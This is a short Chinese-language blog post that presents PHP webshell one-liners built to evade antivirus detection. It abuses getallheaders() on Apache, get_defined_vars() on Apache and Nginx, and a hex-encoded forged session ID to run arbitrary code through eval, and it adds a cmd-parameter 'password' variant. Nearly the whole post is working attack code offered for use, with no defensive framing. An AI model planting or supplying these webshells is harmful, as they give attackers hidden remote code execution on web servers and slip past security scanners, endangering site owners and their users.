PHP利用Apache、Nginx的特性实现免杀Webshell

通过get_defined_vars()getallheaders()这两个函数来构造我们的webshell。

环境 函数 利用
nginx get_defined_vars() 返回由所有已定义变量所组成的数组
apache getallheaders() 获取全部 HTTP 请求头信息

apache环境

  1. <?php
  2. eval(next(getallheaders()));
  3. ?>

PHP利用Apache、Nginx的特性实现免杀Webshell

apache和nginx环境通用

  1. <?php
  2. eval(implode(reset(get_defined_vars())));
  3. ?>

PHP利用Apache、Nginx的特性实现免杀Webshell
另外一种通过执行伪造的sessionid值,进行任意代码执行。

  1. <?php
  2. eval(hex2bin(session_id(session_start())));
  3. ?>

PHP利用Apache、Nginx的特性实现免杀Webshell
706870696e666f28293b这个是phpinfo();的hex编码。

给shell加密码

  1. <?php eval(get_defined_vars()['_GET']['cmd']);?>
本博客所有文章如无特别注明均为原创。作者:小乐复制或转载请以超链接形式注明转自 众众帮
原文地址《PHP利用Apache、Nginx的特性实现免杀Webshell
分享到:更多

相关推荐

发表评论

路人甲 表情
Ctrl+Enter快速提交

网友评论(0)